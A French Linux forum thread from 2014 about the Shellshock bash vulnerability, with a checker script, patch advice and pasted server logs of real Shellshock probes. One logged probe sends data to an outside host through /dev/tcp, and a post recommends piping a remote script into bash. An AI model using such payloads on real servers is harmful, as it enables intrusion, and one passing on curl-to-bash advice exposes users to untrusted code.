Auteur Sujet: Une faille dans BASH a été découverte  (Lu 8941 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne admin

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 1710
  • +74/-3
    • Communauté FR de Kali-linux

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3799
  • +266/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Re : Une faille dans BASH a été découverte
« Réponse #1 le: 25 septembre 2014 à 19:12:51 »
Il y a déjà un patch non officiel, et selon les détails techniques il utiliserait l'option fonction dans une variable, il faudra que je teste.

Hors ligne admin

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 1710
  • +74/-3
    • Communauté FR de Kali-linux
Re : Une faille dans BASH a été découverte
« Réponse #2 le: 25 septembre 2014 à 22:03:04 »
Pour ma part sous Debian un simple "apt-get update && apt-get upgrade" a suffit. ça ne corrige pas tout mais cela devrait suffire. C'est quand même toujours surprenant ces grosses failles si simple une fois connue.

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3799
  • +266/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Re : Une faille dans BASH a été découverte
« Réponse #3 le: 26 septembre 2014 à 18:08:37 »
Voici un petit script afin de vérifier si votre système est Vulnérable.

#!/bin/bash
# Original shellshock-cheker script (C) by coyotus
# Under licence GPLv3 http://www.gnu.org/licenses/gpl.txt

red='\e[0;31m'
green='\e[0;32m'
NC='\e[0m'

if env x='() { :;}; echo vulnerable' bash -c "echo -n" | grep vulnerable > /dev/null 2>&1 ; then
      echo -e "[$red*$NC] Your system is$red vulnerable $NC"
      zenity --error --text "Your system is <span color=\"red\">vulnerable</span>
 <a href='http://www.shellshock.fr' > Information</a>"
else
      echo -e "[$green*$NC] Your system is$red secure $NC"
      zenity --info --text "Your system is <span color=\"green\">secure</span>"
fi

Si zenity est disponible voici ce qui devrait s'afficher



http://www.shellshock.fr/
« Modifié: 26 septembre 2014 à 18:30:26 par coyotus »

Hors ligne Spectrales-Hk

  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 364
  • +30/-1
Re : Une faille dans BASH a été découverte
« Réponse #4 le: 27 septembre 2014 à 12:23:30 »
Merci pour l'info mon système et vulnérable ... je corrige sa tout de suite  ::)

Hors ligne admin

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 1710
  • +74/-3
    • Communauté FR de Kali-linux
Re : Une faille dans BASH a été découverte
« Réponse #5 le: 01 octobre 2014 à 20:15:53 »
et voici la même sous Windows (fonctionne sous Windows 7 a jour) :

http://thesecurityfactory.be/command-injection-windows.html

 ;)

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3799
  • +266/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Re : Une faille dans BASH a été découverte
« Réponse #6 le: 04 octobre 2014 à 08:51:06 »
Suite au post précédent du forum *On* un membre du forum de handylinux, m'a appris qu'il existait une seconde faille bash, Shellshock2

De mon coté, J'ai donc modifié mon script pour tester les 2 vulnérabilité bash.

Voici le nouveau code:

#!/bin/bash
# Shellshock Vulnerability Tester Script
# Original shellshock-cheker script (C) by coyotus
# Under licence GPLv3 http://www.gnu.org/licenses/gpl.txt
# optional required "zenity"

echo '''
       .__           .__  .__         .__                   __                    .__                   __                 
  _____|  |__   ____ |  | |  |   _____|  |__   ____   ____ |  | __           ____ |  |__   ____   ____ |  | __ ___________
 /  ___/  |  \_/ __ \|  | |  |  /  ___/  |  \ /  _ \_/ ___\|  |/ /  ______ _/ ___\|  |  \_/ __ \_/ ___\|  |/ // __ \_  __ \
 \___ \|   Y  \  ___/|  |_|  |__\___ \|   Y  (  <_> )  \___|    <  /_____/ \  \___|   Y  \  ___/\  \___|    <\  ___/|  | \/
/____  >___|  /\___  >____/____/____  >___|  /\____/ \___  >__|_ \          \___  >___|  /\___  >\___  >__|_ \\___  >__|   
     \/     \/     \/               \/     \/            \/     \/              \/     \/     \/     \/     \/    \/   
'''

red='\e[0;31m'
green='\e[0;32m'
NC='\e[0m'

if env x='() { :;}; echo vulnerable' bash -c "echo -n" | grep vulnerable > /dev/null 2>&1 ; then
      echo -e "[$red*$NC] Your system is$red vulnerable $NC"
      zenity --error --text "Your system is <span color=\"red\">vulnerable</span>
 <a href='https://access.redhat.com/security/cve/CVE-2014-6271' > Information</a>"
elif $(env x='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "Toujours vulnerable") | grep vulnerable ; then
      echo -e "[$red*$NC] Your system is$red vulnerable $NC"
      zenity --error --text "Your system is <span color=\"red\">vulnerable</span>
 <a href='https://access.redhat.com/security/cve/CVE-2014-7169' > Information</a>"
else
      echo -e "[$green*$NC] Your system is$green secure $NC"
      zenity --info --text "Your system is <span color=\"green\">secure</span>"
fi

Pour télécharger le fichier utilisez ce lien http://www.coyotus.com/repo/script/shellshock-checker

Vous pouvez tester directement en téléchargent avec cette ligne de commande:

wget http://www.coyotus.com/repo/script/shellshock-checker && chmod +x shellshock-checker && bash shellshock-checker
Pour tester sans télécharger:

curl http://www.coyotus.com/repo/script/shellshock-checker | bash
Si zenity est disponible voici ce qui devrait s'afficher



Pour corriger la faille, mettez simplement votre système à jour.



http://www.shellshock.fr/
http://seclists.org/oss-sec/2014/q3/649
https://access.redhat.com/security/cve/CVE-2014-6271
http://www.ikoula-blog.com/faille_bash
https://access.redhat.com/security/cve/CVE-2014-7169

Hors ligne admin

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 1710
  • +74/-3
    • Communauté FR de Kali-linux
Re : Une faille dans BASH a été découverte
« Réponse #7 le: 04 octobre 2014 à 15:11:11 »
merci du retour pour shellshock2  :D

Hors ligne admin

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 1710
  • +74/-3
    • Communauté FR de Kali-linux
Re : Une faille dans BASH a été découverte
« Réponse #8 le: 07 octobre 2014 à 22:43:48 »
Faudrait dire aux visiteurs que kali-linux.fr :

- possède des versions de bash à jour;
- n'utilise pas de CGI;
- journalise les requêtes illicites :

<181>Oct 6 19:07:02 reverse nginx: 162.244.34.28 - - [06/Oct/2014:19:06:54 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 4295 "-" "() { :;}; /bin/bash -c \x22echo http://www.kali-linux.fr/cgi-sys/entropysearch.cgi > /dev/tcp/162.244.34.27/9091\x22"

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3799
  • +266/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Re : Une faille dans BASH a été découverte
« Réponse #9 le: 08 octobre 2014 à 06:46:39 »
C'est l'utilisateur script-kiddie ça mdr

Hors ligne admin

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 1710
  • +74/-3
    • Communauté FR de Kali-linux
Re : Une faille dans BASH a été découverte
« Réponse #10 le: 08 octobre 2014 à 08:23:19 »
ou un script automatique qui scanne de nombreux sites. Tu as trouvé des choses dans tes logs Coyotus ?

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3799
  • +266/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Re : Re : Une faille dans BASH a été découverte
« Réponse #11 le: 08 octobre 2014 à 18:30:52 »
ou un script automatique qui scanne de nombreux sites. Tu as trouvé des choses dans tes logs Coyotus ?
Non rien de tout ça pour le moment.

Hors ligne admin

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 1710
  • +74/-3
    • Communauté FR de Kali-linux
Re : Une faille dans BASH a été découverte
« Réponse #12 le: 23 octobre 2014 à 01:01:13 »
ça continue chez moi :

<181>Oct 22 17:51:13 reverse nginx: 74.208.144.161 - - [22/Oct/2014:17:51:04 +0200] "GET /cgi-bin/test.cgi HTTP/1.1" 404 295 "-" "() { :;};echo -e \x22\x5Cr\x5CncQy0kWQlNeGOkfry7XSytAQpn$(echo cQy0kWQlNeGOkfry7XSytAQpn)cQy0kWQlNeGOkfry7XSytAQpn\x22"